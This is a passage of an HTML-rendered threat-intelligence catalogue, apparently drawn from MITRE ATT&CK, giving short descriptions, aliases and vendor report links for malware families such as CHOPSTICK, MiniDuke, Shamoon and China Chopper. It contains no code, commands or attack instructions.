<p>Kasidet is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)</p>
</div>
<div class="paragraph">
<p>Aliases: Kasidet</p>
</div>
<div class="paragraph">
<p>Kasidet - S0088 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Kasidet</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1049. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0088">https://attack.mitre.org/wiki/Software/S0088</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html">http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023"><a class="anchor" href="#_chopstick_s0023"></a><a class="link" href="#_chopstick_s0023">CHOPSTICK - S0023</a></h3>
<div class="paragraph">
<p>CHOPSTICK is malware family of modular backdoors used by APT28. It has been used from at least November 2012 to August 2016 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28) January 2017</p>
</div>
<div class="paragraph">
<p>Aliases: CHOPSTICK, SPLM, Xagent, X-Agent, webhp</p>
</div>
<div class="paragraph">
<p>CHOPSTICK - S0023 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CHOPSTICK</p>
</li>
<li>
<p>SPLM</p>
</li>
<li>
<p>Xagent</p>
</li>
<li>
<p>X-Agent</p>
</li>
<li>
<p>webhp</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1050. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0023">https://attack.mitre.org/wiki/Software/S0023</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_miniduke_s0051"><a class="anchor" href="#_miniduke_s0051"></a><a class="link" href="#_miniduke_s0051">MiniDuke - S0051</a></h3>
<div class="paragraph">
<p>MiniDuke is malware that was used by APT29 from 2010 to 2015. The MiniDuke toolset consists of multiple downloader and backdoor components. The loader has been used with other MiniDuke components as well as in conjunction with CosmicDuke and PinchDuke. (Citation: F-Secure The Dukes)</p>
</div>
<div class="paragraph">
<p>Aliases: MiniDuke</p>
</div>
<div class="paragraph">
<p>MiniDuke - S0051 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>MiniDuke</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1051. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0051">https://attack.mitre.org/wiki/Software/S0051</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127"><a class="anchor" href="#_bbsrat_s0127"></a><a class="link" href="#_bbsrat_s0127">BBSRAT - S0127</a></h3>
<div class="paragraph">
<p>BBSRAT is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)</p>
</div>
<div class="paragraph">
<p>Aliases: BBSRAT</p>
</div>
<div class="paragraph">
<p>BBSRAT - S0127 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BBSRAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1052. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0127">https://attack.mitre.org/wiki/Software/S0127</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/">http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_elise_s0081"><a class="anchor" href="#_elise_s0081"></a><a class="link" href="#_elise_s0081">Elise - S0081</a></h3>
<div class="paragraph">
<p>Elise is a custom backdoor Trojan that appears to be used exclusively by Lotus Blossom. It is part of a larger group of
tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)</p>
</div>
<div class="paragraph">
<p>Aliases: Elise, BKDR_ESILE, Page</p>
</div>
<div class="paragraph">
<p>Elise - S0081 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Elise</p>
</li>
<li>
<p>BKDR_ESILE</p>
</li>
<li>
<p>Page</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1053. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0081">https://attack.mitre.org/wiki/Software/S0081</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html">https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_komprogo_s0156"><a class="anchor" href="#_komprogo_s0156"></a><a class="link" href="#_komprogo_s0156">KOMPROGO - S0156</a></h3>
<div class="paragraph">
<p>KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: KOMPROGO</p>
</div>
<div class="paragraph">
<p>KOMPROGO - S0156 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>KOMPROGO</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1054. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0156">https://attack.mitre.org/wiki/Software/S0156</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_biscuit_s0017"><a class="anchor" href="#_biscuit_s0017"></a><a class="link" href="#_biscuit_s0017">BISCUIT - S0017</a></h3>
<div class="paragraph">
<p>BISCUIT is a backdoor that has been used by APT1 since as early as 2007. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>Aliases: BISCUIT</p>
</div>
<div class="paragraph">
<p>BISCUIT - S0017 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BISCUIT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1055. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0017">https://attack.mitre.org/wiki/Software/S0017</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uroburos_s0022"><a class="anchor" href="#_uroburos_s0022"></a><a class="link" href="#_uroburos_s0022">Uroburos - S0022</a></h3>
<div class="paragraph">
<p>Uroburos is a rootkit used by Turla. (Citation: Kaspersky Turla)</p>
</div>
<div class="paragraph">
<p>Aliases: Uroburos</p>
</div>
<div class="paragraph">
<p>Uroburos - S0022 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Uroburos</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1056. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0022">https://attack.mitre.org/wiki/Software/S0022</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/the-epic-turla-operation/65545/">https://securelist.com/the-epic-turla-operation/65545/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_powersource_s0145"><a class="anchor" href="#_powersource_s0145"></a><a class="link" href="#_powersource_s0145">POWERSOURCE - S0145</a></h3>
<div class="paragraph">
<p>POWERSOURCE is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: POWERSOURCE, DNSMessenger</p>
</div>
<div class="paragraph">
<p>POWERSOURCE - S0145 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>POWERSOURCE</p>
</li>
<li>
<p>DNSMessenger</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1057. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0145">https://attack.mitre.org/wiki/Software/S0145</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html">https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/03/dnsmessenger.html">http://blog.talosintelligence.com/2017/03/dnsmessenger.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hcdloader_s0071"><a class="anchor" href="#_hcdloader_s0071"></a><a class="link" href="#_hcdloader_s0071">hcdLoader - S0071</a></h3>
<div class="paragraph">
<p>hcdLoader is a remote access tool (RAT) that has been used by APT18. (Citation: Dell Lateral Movement)</p>
</div>
<div class="paragraph">
<p>Aliases: hcdLoader</p>
</div>
<div class="paragraph">
<p>hcdLoader - S0071 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>hcdLoader</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1058. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0071">https://attack.mitre.org/wiki/Software/S0071</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/">http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeroaccess_s0027"><a class="anchor" href="#_zeroaccess_s0027"></a><a class="link" href="#_zeroaccess_s0027">Zeroaccess - S0027</a></h3>
<div class="paragraph">
<p>Zeroaccess is a kernel-mode Rootkit that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)</p>
</div>
<div class="paragraph">
<p>Aliases: Zeroaccess, Trojan.Zeroaccess</p>
</div>
<div class="paragraph">
<p>Zeroaccess - S0027 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zeroaccess</p>
</li>
<li>
<p>Trojan.Zeroaccess</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1059. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0027">https://attack.mitre.org/wiki/Software/S0027</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf">https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_skeleton_key_s0007"><a class="anchor" href="#_skeleton_key_s0007"></a><a class="link" href="#_skeleton_key_s0007">Skeleton Key - S0007</a></h3>
<div class="paragraph">
<p>Skeleton Key is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to Skeleton Key is included as a module in Mimikatz.</p>
</div>
<div class="paragraph">
<p>Aliases: Skeleton Key</p>
</div>
<div class="paragraph">
<p>Skeleton Key - S0007 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Skeleton Key</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1060. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0007">https://attack.mitre.org/wiki/Software/S0007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/">http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shamoon_s0140"><a class="anchor" href="#_shamoon_s0140"></a><a class="link" href="#_shamoon_s0140">Shamoon - S0140</a></h3>
<div class="paragraph">
<p>Shamoon is malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. The 2.0 version was seen in 2016 targeting Middle Eastern states. (Citation: FireEye Shamoon Nov 2016) (Citation: Palo Alto Shamoon Nov 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: Shamoon, Disttrack</p>
</div>
<div class="paragraph">
<p>Shamoon - S0140 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Shamoon</p>
</li>
<li>
<p>Disttrack</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1061. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0140">https://attack.mitre.org/wiki/Software/S0140</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/11/fireeye%20respondsto.html">https://www.fireeye.com/blog/threat-research/2016/11/fireeye%20respondsto.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/">http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fallchill_s0181"><a class="anchor" href="#_fallchill_s0181"></a><a class="link" href="#_fallchill_s0181">FALLCHILL - S0181</a></h3>
<div class="paragraph">
<p>is a RAT that has been used by Lazarus Group since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other Lazarus Group malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: FALLCHILL</p>
</div>
<div class="paragraph">
<p>FALLCHILL - S0181 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FALLCHILL</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1062. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0181">https://attack.mitre.org/wiki/Software/S0181</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-318A">https://www.us-cert.gov/ncas/alerts/TA17-318A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180"><a class="anchor" href="#_volgmer_s0180"></a><a class="link" href="#_volgmer_s0180">Volgmer - S0180</a></h3>
<div class="paragraph">
<p>is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: Volgmer</p>
</div>
<div class="paragraph">
<p>Volgmer - S0180 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Volgmer</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1063. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0180">https://attack.mitre.org/wiki/Software/S0180</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA17-318B">https://www.us-cert.gov/ncas/alerts/TA17-318B</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tdtess_s0164"><a class="anchor" href="#_tdtess_s0164"></a><a class="link" href="#_tdtess_s0164">TDTESS - S0164</a></h3>
<div class="paragraph">
<p>is a 64-bit .NET binary backdoor used by CopyKittens. (Citation: ClearSky Wilted Tulip July 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: TDTESS</p>
</div>
<div class="paragraph">
<p>TDTESS - S0164 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TDTESS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1064. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0164">https://attack.mitre.org/wiki/Software/S0164</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/wp-content/uploads/2017/07/Operation%20Wilted%20Tulip.pdf">http://www.clearskysec.com/wp-content/uploads/2017/07/Operation%20Wilted%20Tulip.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_4h_rat_s0065"><a class="anchor" href="#_4h_rat_s0065"></a><a class="link" href="#_4h_rat_s0065">4H RAT - S0065</a></h3>
<div class="paragraph">
<p>4H RAT is malware that has been used by Putter Panda since at least 2007. (Citation: CrowdStrike Putter Panda)</p>
</div>
<div class="paragraph">
<p>Aliases: 4H RAT</p>
</div>
<div class="paragraph">
<p>4H RAT - S0065 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>4H RAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1065. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0065">https://attack.mitre.org/wiki/Software/S0065</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bootrash_s0114"><a class="anchor" href="#_bootrash_s0114"></a><a class="link" href="#_bootrash_s0114">BOOTRASH - S0114</a></h3>
<div class="paragraph">
<p>BOOTRASH is a Bootkit that targets Windows operating systems. It has been used by threat actors that target the financial sector. (Citation: MTrends 2016)</p>
</div>
<div class="paragraph">
<p>Aliases: BOOTRASH</p>
</div>
<div class="paragraph">
<p>BOOTRASH - S0114 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BOOTRASH</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1066. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0114">https://attack.mitre.org/wiki/Software/S0114</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/regional/fr%20FR/offers/pdfs/ig-mtrends-2016.pdf">https://www.fireeye.com/content/dam/fireeye-www/regional/fr%20FR/offers/pdfs/ig-mtrends-2016.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_china_chopper_s0020"><a class="anchor" href="#_china_chopper_s0020"></a><a class="link" href="#_china_chopper_s0020">China Chopper - S0020</a></h3>
<div class="paragraph">
<p>China Chopper is a Web shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups, including Threat Group-3390. (Citation: Dell TG-3390)</p>
</div>
<div class="paragraph">
<p>Aliases: China Chopper</p>
</div>
<div class="paragraph">
<p>China Chopper - S0020 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>China Chopper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1067. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0020">https://attack.mitre.org/wiki/Software/S0020</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html">https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wiper_s0041"><a class="anchor" href="#_wiper_s0041"></a><a class="link" href="#_wiper_s0041">Wiper - S0041</a></h3>
<div class="paragraph">
<p>Wiper is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)</p>
</div>
<div class="paragraph">
<p>Aliases: Wiper</p>
</div>
<div class="paragraph">
<p>Wiper - S0041 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Wiper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1068. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0041">https://attack.mitre.org/wiki/Software/S0041</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/">http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130"><a class="anchor" href="#_unknown_logger_s0130"></a><a class="link" href="#_unknown_logger_s0130">Unknown Logger - S0130</a></h3>
<div class="paragraph">
<p>Unknown Logger is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)</p>
</div>
<div class="paragraph">
<p>Aliases: Unknown Logger</p>
</div>
<div class="paragraph">
<p>Unknown Logger - S0130 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Unknown Logger</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1069. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0130">https://attack.mitre.org/wiki/Software/S0130</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gh0st_s0032"><a class="anchor" href="#_gh0st_s0032"></a><a class="link" href="#_gh0st_s0032">gh0st - S0032</a></h3>
<div class="paragraph">
<p>gh0st is a remote access tool (RAT). The source code is public and it has been used by many groups. (Citation: FireEye Hacking Team)</p>
</div>
<div class="paragraph">
<p>Aliases: gh0st</p>
</div>
<div class="paragraph">
<p>gh0st - S0032 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>gh0st</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1070. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0032">https://attack.mitre.org/wiki/Software/S0032</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/07/demonstrating%20hustle.html">https://www.fireeye.com/blog/threat-research/2015/07/demonstrating%20hustle.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_helminth_s0170"><a class="anchor" href="#_helminth_s0170"></a><a class="link" href="#_helminth_s0170">Helminth - S0170</a></h3>
<div class="paragraph">
